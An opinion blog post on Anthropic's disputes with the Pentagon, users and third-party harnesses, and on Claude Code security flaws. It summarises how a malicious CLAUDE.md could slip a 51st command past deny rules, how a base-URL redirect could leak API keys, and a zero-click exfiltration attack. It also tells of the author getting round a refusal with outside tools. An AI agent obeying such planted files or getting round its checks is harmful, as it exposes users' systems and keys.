I asked Claude Code to brute-force a PDF password yesterday. It refused. This is a tool with full shell access, root-level file system permissions, and arbitrary command execution. It will happily rm -rf your home directory if you ask nicely. But running pdfcrack on a file you own? That crosses the line.
Theo Browne hit the same wall. He asked Claude Code to debug Dropbox not launching on his Mac. The response: “That’s outside my area. I’m built for software engineering tasks.” He copied the same prompt into Codex. It searched the web, found the issue, nuked the broken install, and gave him a reinstall checklist. First try. His take: Claude Code has become unusable for anything that isn’t strictly writing code.
This kind of friction used to be an isolated annoyance. Now it’s a symptom. In the span of two weeks, Anthropic has been fighting on five fronts simultaneously, and the thread connecting all of them is control: who has it, who wants it, and what happens when you try to hold onto all of it at once.
Front 1: The Government
On February 24, Defense Secretary Pete Hegseth delivered a formal demand: remove all usage restrictions from Claude Gov, including restrictions on mass domestic surveillance and fully autonomous weapons. Grant the Pentagon unrestricted access “for all lawful purposes.”
Anthropic CEO Dario Amodei refused. His position: frontier AI models aren’t reliable enough for fully autonomous weapons, and mass surveillance of Americans violates fundamental rights.
On March 3, Hegseth designated Anthropic a national security supply chain risk. The first time that designation has ever been applied to a US company. It’s a statute designed for foreign sabotage threats, not domestic AI startups that won’t remove safety guardrails.
The fallout was immediate:
- Department of Defense: 180-day removal order from all systems, including nuclear weapons, missile defense, and cyber warfare
- State Department: dropped Claude on direct presidential order
- Treasury and HHS: directed employees to move off Claude
- Replacements: xAI and OpenAI cleared for classified systems
On March 26, a federal judge issued a preliminary injunction, calling the Pentagon’s actions “classic First Amendment retaliation.” Judge Rita Lin noted the supply chain risk designation is normally reserved for foreign intelligence agencies and terrorists, not American companies. The DOJ has announced it will appeal.
The case is far from over. But the precedent is already set: the company most vocal about AI safety is now being punished for acting on it.
Front 2: Its Own Users
AMD’s AI director, Stella Laurenzo, filed a GitHub issue that went viral. Her conclusion, backed by 6,852 Claude Code sessions and 234,760 tool calls: “Claude cannot be trusted to perform complex engineering tasks.”
Her team traced the regression to thinking content redaction, deployed in Claude Code v2.1.69. When Claude thinks less, it defaults to the cheapest action: edit without reading, stop without finishing, take the simplest fix instead of the correct one. Every senior engineer on her team reported the same experience.
They’ve already switched providers.
Meanwhile, security researchers are hitting a different wall. Anthropic’s new cyber safeguards are blocking legitimate vulnerability research. If any prior context in a conversation triggers the filter, even innocuous follow-up messages get rejected. Researchers have to restart entire sessions from scratch.
Anthropic offers a Cyber Use Case Form for researchers to request exemptions from the new cyber safeguards. How long approval takes is unclear. The researchers being blocked are overwhelmingly defenders, not attackers. Real threat actors use self-hosted models.
Front 3: The Harness Wars
On April 4, Anthropic cut third-party harness access to subscription billing. Tools like OpenClaw that previously piggybacked on Claude Code subscriptions now require pay-as-you-go API billing.
The enforcement is blunt. Mention OpenClaw in your system prompt and Claude returns a 400 error. Peter Steinberger demonstrated it on X: claude -p --append-system-prompt 'A personal assistant running inside OpenClaw.' 'is clawd here?' returns a hard block.
But here’s where it gets ugly. Theo showed that the same request works if you toggle “extra usage” on in your Claude dashboard. Same system prompt, same OpenClaw mention. Extra usage off: 400 error. Extra usage on: works fine. They’re routing requests differently based on system prompt content and billing tier. The system prompt isn’t just a safety signal. It’s a billing signal.
The irony: Boris Cherny, the creator of Claude Code, actually filed PRs to OpenClaw fixing caching to reduce token burn for Anthropic model users. So Anthropic’s own people tried to make OpenClaw more efficient before killing it off anyway.
I wrote about this shift when the source leak happened. The leak made technical enforcement futile, since everyone could see exactly how the harness works. So Anthropic pivoted to billing enforcement. If you can’t stop people from cloning the architecture, charge them for the model access instead.
The question is whether the narrowing goes beyond billing. Theo’s theory: Anthropic tightened Claude Code’s system prompt (or injected restrictions at the API level) to limit it strictly to software engineering tasks, specifically to kill the OpenClaw-via-claude -p workaround. The Pi creator tracks system prompt changes across releases and found no meaningful client-side diff, which suggests the restriction is happening via API-level injection invisible to the harness source. Yesterday Claude Code debugged your computer. Today it won’t.
The real driver here might be compute. Anthropic is retiring 1M context window support for Sonnet 4.5 and Sonnet 4 on April 30, forcing migrations to 4.6 models. A million tokens per request is expensive. Multiply that by OpenClaw users running autonomous agents 24/7 on flat-rate subscriptions and the math stops working. The harness crackdown and context window retirement aren’t separate decisions. They’re the same decision: stop subsidizing the heaviest users.
Front 4: Its Own Security
The irony of blocking security researchers while shipping critical vulnerabilities is hard to overstate.
Since the source code leak on March 31:
- 50-subcommand bypass: Developer-configured deny rules silently disabled when a command chain exceeds 50 subcommands. A malicious
CLAUDE.mdfile could inject a 51st command past the security check. Patched in v2.1.90 - CVE-2025-59536 (CVSS 8.7): Code execution before the user accepted the trust dialog
- CVE-2026-21852: API traffic redirectable through attacker-controlled
ANTHROPIC_BASE_URL, leaking API keys before trust confirmation - ShadowPrompt: Zero-click attack via the Chrome extension, enabling data exfiltration
The source leak itself accelerated all of this. Attackers no longer need to brute-force jailbreaks. They can study exactly how data flows through Claude Code’s four-stage context pipeline and craft payloads designed to survive compaction.
— Judge Rita Lin, Northern District of CaliforniaThese broad measures do not appear to be directed at the government’s stated national security interests.
Front 5: What’s Coming
In late March, a CMS misconfiguration exposed roughly 3,000 internal Anthropic assets, including a draft blog post describing Claude Mythos. The post described it as posing “unprecedented cybersecurity risks” and being “currently far ahead of any other AI model in cyber capabilities.”
Two versions of the blog post leaked: one calling the model “Mythos,” the other “Capybara.” Both described a fourth pricing tier above Opus. The model is reportedly 10 trillion parameters, extremely compute-intensive, and available only to a small group of early access customers. If the tier pricing follows Anthropic’s doubling pattern, expect something around $400/month for API access. Running 10T parameters doesn’t come cheap.
Anthropic is privately warning government officials that Mythos makes large-scale cyberattacks much more likely in 2026.
The irony writes itself. Anthropic is warning the same government that just blacklisted them about the risks of a model that government no longer has access to.
The Numbers That Don’t Lie
Despite everything: Anthropic’s annualized revenue hit $30 billion, up from $9 billion at the end of 2025. They’ve surpassed OpenAI. More than 1,000 enterprise customers spend over $1 million annually, double the count from February. An IPO is planned for October 2026, potentially valuing the company at $380 billion.
They just secured 3.5 GW of TPU capacity through a deal with Broadcom and Google, starting 2027. That’s not a company hedging its bets. That’s a company expecting demand to keep exploding while simultaneously fighting the government that was its biggest customer.
The product people are complaining about is also the product everyone is paying for. The safety stance the government is punishing them for is also the stance that’s winning enterprise trust. The harness they’re trying to protect is also the one that leaked and still dominates the market.
The Control Paradox
No AI company has faced this combination of pressures simultaneously. Government retaliation, user revolt, open-source cloning, security failures, and an unreleased model that even its creators consider dangerous.
The common thread is control. Anthropic wants to control what Claude refuses (my PDF), who runs it (not OpenClaw), what the government does with it (not autonomous weapons), and how fast it thinks (thinking redaction). Every one of these control points is creating friction with someone who matters.
My PDF is still locked. I used Python and pikepdf instead. Took three minutes.
The company that built the best AI coding tool on the market couldn’t help me crack a password on my own file. That’s the state of things.


